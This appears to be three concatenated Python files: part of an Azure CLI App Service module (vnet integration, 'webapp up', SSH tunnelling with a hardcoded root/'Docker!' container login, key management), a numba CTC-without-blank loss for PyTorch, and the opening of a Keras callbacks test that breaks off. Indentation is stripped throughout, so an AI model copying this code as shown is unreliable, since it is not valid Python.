swiftVnet, slot)
    # reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
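# Illustrative CLI usage for add_vnet_integration above (placeholder values; assumes the
# 'az webapp vnet-integration add' command surface):
#   az webapp vnet-integration add -g MyResourceGroup -n MyWebApp --vnet MyVnet --subnet MySubnet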
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
        # Get the ASP & RG info; if the ASP & RG parameters are provided we use those, otherwise we look them up
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.".format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise an error if the app's existing OS differs from the one detected or requested
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
        logger.warning("Web app will be created with the configuration below. Re-run the command "
                       "without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # always call the ASP create-or-update API so that, on re-deployment, any changes to the SKU
    # or plan settings are applied
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
    else: # for an existing app, check whether the stack runtime settings need updating
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. Currently no way to poll for this
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. Currently no way to poll for this
create_json['runtime_version'] = runtime_version
    # Zip contents & deploy
    logger.warning("Creating zip with contents of dir %s ...", src_dir)
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
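# Illustrative CLI usage for webapp_up above (placeholder values; flags mirror the function
# signature, and the runtime string and region are examples only):
#   az webapp up -n MyWebApp -g MyResourceGroup --sku F1 --location westeurope \
#       --runtime "node|12-lts" --dryrun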
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
    # wake up Kudu by making an SCM call
    import requests
    # workaround until the timeout-limits issue for Linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
        raise CLIError('webapp ssh is only supported on Linux and macOS')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
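# Illustrative CLI usage for ssh_webapp above (placeholder values; the target app must be a Linux
# app and the client cannot be Windows, per the checks in ssh_webapp and get_tunnel):
#   az webapp ssh -n MyLinuxWebApp -g MyResourceGroup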
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
    else:
        result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
raw=True)
    else:
        result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name,
                                                        raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
ctc_without_blank.py
|
import queue
import threading
import numba
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Function, Variable
from pytorch_end2end.functions.utils import log_sum_exp
@numba.jit(nogil=True)
def _ctc_without_blank_loss(logits, targets, space_idx):
"""
    CTC-like loss without a blank symbol, following Graves et al.:
    http://www.cs.toronto.edu/~graves/icml_2006.pdf
    :param logits: numpy array, sequence_len * num_labels (log-probabilities)
    :param targets: numpy array, target labels
    :param space_idx: index of the space label, or -1 if no spaces are inserted
:return: loss (float), gradient (same shape as logits)
"""
targets_len = targets.shape[0]
prediction_len = logits.shape[0]
num_labels = logits.shape[1]
using_additional_spaces = False
if targets_len == 0 or (targets_len == 1 and targets[0] == space_idx):
extended_targets_len = 1
extended_targets = np.ones(extended_targets_len, dtype=np.int64) * space_idx
elif space_idx == -1:
extended_targets_len = targets_len
extended_targets = targets
else:
using_additional_spaces = True
extended_targets_len = targets_len + 2
extended_targets = np.ones(extended_targets_len, dtype=np.int64) * space_idx
extended_targets[1:extended_targets_len - 1] = targets
# alpha and beta computation
# forward - alpha
log_alpha = np.zeros((extended_targets_len, prediction_len))
log_alpha[:] = -np.inf # numba bugfix instead of log_alpha.fill(-np.inf)
if prediction_len > 1 or extended_targets_len == 1:
log_alpha[0, 0] = logits[0, extended_targets[0]]
if extended_targets_len > 1 and using_additional_spaces:
log_alpha[1, 0] = logits[0, extended_targets[1]]
for t in range(1, prediction_len): # timesteps
start = max(0, extended_targets_len - prediction_len + t - 1) if using_additional_spaces \
else max(0, extended_targets_len - prediction_len + t)
end = min(t + 2, extended_targets_len) if using_additional_spaces else min(t + 1, extended_targets_len)
log_alpha[start:end, t] = log_alpha[start:end, t - 1]
for j in range(start, end):
current_label = extended_targets[j]
if j > 0:
log_alpha[j, t] = log_sum_exp(log_alpha[j, t], log_alpha[j - 1, t - 1])
log_alpha[j, t] += logits[t, current_label]
if extended_targets_len > 1 and using_additional_spaces:
loss_forward = log_sum_exp(log_alpha[extended_targets_len - 1, prediction_len - 1],
log_alpha[extended_targets_len - 2, prediction_len - 1])
else:
loss_forward = log_alpha[extended_targets_len - 1, prediction_len - 1]
# backward - beta
log_beta = np.zeros((extended_targets_len, prediction_len))
log_beta[:] = -np.inf # numba bugfix instead of log_beta.fill(-np.inf)
if prediction_len > 1 or extended_targets_len == 1:
log_beta[extended_targets_len - 1, prediction_len - 1] = 0
if extended_targets_len > 1 and using_additional_spaces:
log_beta[extended_targets_len - 2, prediction_len - 1] = 0
for t in range(prediction_len - 2, -1, -1): # timesteps
start = max(0, extended_targets_len - prediction_len + t - 1) if using_additional_spaces \
else max(0, extended_targets_len - prediction_len + t)
end = min(t + 2, extended_targets_len) if using_additional_spaces else min(t + 1, extended_targets_len)
for j in range(start, end):
log_beta[j, t] = log_beta[j, t + 1] + logits[t + 1, extended_targets[j]]
if j < extended_targets_len - 1:
log_beta[j, t] = log_sum_exp(log_beta[j, t],
log_beta[j + 1, t + 1] + logits[t + 1, extended_targets[j + 1]])
alpha_beta = log_alpha + log_beta
prob_sum = np.zeros((prediction_len, num_labels))
prob_sum[:] = -np.inf
for i in range(extended_targets_len):
current_label = extended_targets[i]
prob_sum[:, current_label] = log_sum_exp(prob_sum[:, current_label], alpha_beta[i, :])
negative_term = prob_sum - loss_forward
grad = np.exp(logits) - np.exp(negative_term)
return -loss_forward, grad
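# Illustrative sanity check (not part of the original module); it relies only on
# numpy and the loss function above.
def _toy_loss_example():
    """With a single timestep, a single-label target and space_idx=-1 (so no
    spaces are appended), the forward pass above reduces to the negative
    log-probability assigned to that label."""
    toy_logits = np.log(np.full((1, 3), 1.0 / 3.0))  # one frame, uniform log-probs
    toy_targets = np.array([1], dtype=np.int64)
    loss, _grad = _ctc_without_blank_loss(toy_logits, toy_targets, -1)
    assert np.isclose(loss, -np.log(1.0 / 3.0))
    return loss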
def _ctc_without_blank_3d_loss(logits, targets, logits_lengths, targets_length, space_idx=-1):
batch_size = len(targets_length)
grads = np.zeros_like(logits)
losses = np.zeros(batch_size)
    # Parallel computation with threads: the GIL is released inside the numba.jit(nogil=True)-compiled loss
que = queue.Queue()
threads = []
for i in range(batch_size):
t = threading.Thread(target=lambda q, i, *args: q.put((i, _ctc_without_blank_loss(*args))),
args=(que, i, logits[i, :logits_lengths[i], :],
targets[i, :targets_length[i]], space_idx))
threads.append(t)
t.start()
for t in threads:
t.join()
while not que.empty():
i, (loss, grad) = que.get()
grads[i, :logits_lengths[i], :] = grad
losses[i] = loss
return losses, grads
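# Illustrative sketch of the shapes expected by the threaded batch loss above
# (not part of the original module): logits are (batch, max_frames, num_labels)
# log-probabilities, and the per-example length arrays select the valid prefix
# of each sequence.
def _toy_batched_loss_example():
    batch, max_frames, num_labels = 2, 4, 3
    logits = np.log(np.full((batch, max_frames, num_labels), 1.0 / num_labels))
    targets = np.array([[1, 2], [2, 0]], dtype=np.int64)
    logits_lengths = np.array([4, 3])
    targets_length = np.array([2, 1])
    losses, grads = _ctc_without_blank_3d_loss(logits, targets, logits_lengths, targets_length)
    assert losses.shape == (batch,) and grads.shape == logits.shape
    # frames beyond each example's logits_length keep a zero gradient
    assert np.all(grads[1, 3:, :] == 0)
    return losses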
class CTCWithoutBlankLossFunction(Function):
@staticmethod
def forward(ctx, logits, targets, logits_lengths, targets_lengths, space_idx=-1):
        # logits: expected shape batch_size * sequence_length * num_labels, already passed through log_softmax
loss, grads = _ctc_without_blank_3d_loss(logits.cpu().numpy(), targets.cpu().numpy(),
logits_lengths.cpu().numpy(), targets_lengths.cpu().numpy(), space_idx)
        ctx.grads = torch.FloatTensor(grads)  # ctx.save_for_backward does not work here, so stash the gradients on ctx
if logits.is_cuda:
return torch.FloatTensor(loss).cuda(logits.get_device())
return torch.FloatTensor(loss)
@staticmethod
def backward(ctx, grad_output):
"""
:param grad_output: [batch_size]
:return:
"""
loss_grads = Variable(ctx.grads)
if grad_output.is_cuda:
loss_grads = loss_grads.cuda(grad_output.get_device())
grad = loss_grads.contiguous() * grad_output.contiguous().view(-1, 1, 1)
return grad, None, None, None, None
if __name__ == "__main__":
from torch.autograd import gradcheck
    # gradcheck takes a tuple of tensors as input and checks whether the gradient
    # evaluated with these tensors is close enough to numerical approximations;
    # it returns True if they all satisfy this condition.
# alphabet_size = 30
# max_targets_len = 50
# max_sequence_len = 100
# batch_size = 2
alphabet_size = 5
max_targets_len = 100
max_sequence_len = 200
# max_targets_len = 5
# max_sequence_len = 6
batch_size = 1
np.random.seed(523)
targets_lengths = np.random.randint(1, max_targets_len + 1, batch_size)
logits_lengths = targets_lengths + np.random.randint(0, (max_sequence_len - max_targets_len) + 1, batch_size)
logits = np.random.randn(batch_size, max_sequence_len, alphabet_size)
    # labels in [1, alphabet_size) so they stay within the logits' label dimension
    targets = np.random.randint(1, alphabet_size, (batch_size, max_targets_len)).astype(np.int64)
input = (nn.LogSoftmax(dim=2)(Variable(torch.FloatTensor(logits), requires_grad=True)),
Variable(torch.LongTensor(targets), requires_grad=False),
Variable(torch.LongTensor(logits_lengths), requires_grad=False),
Variable(torch.LongTensor(targets_lengths), requires_grad=False))
print(CTCWithoutBlankLossFunction.apply(*input).data)
test = gradcheck(CTCWithoutBlankLossFunction.apply, input) # , atol=1e-5, rtol=1e-5)
print(test)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
    method_counts: dict. Contains the number of times each callback method was
      run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
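# Illustrative usage sketch (not part of the original test file): the wrapped
# hooks above simply increment `method_counts` on every call, so invoking a
# hook directly is enough to observe the counting.
def _counter_usage_sketch():
  counter = Counter()
  counter.on_epoch_begin(0)
  counter.on_epoch_begin(1)
  assert counter.method_counts['on_epoch_begin'] == 2
  return counter.method_counts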
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
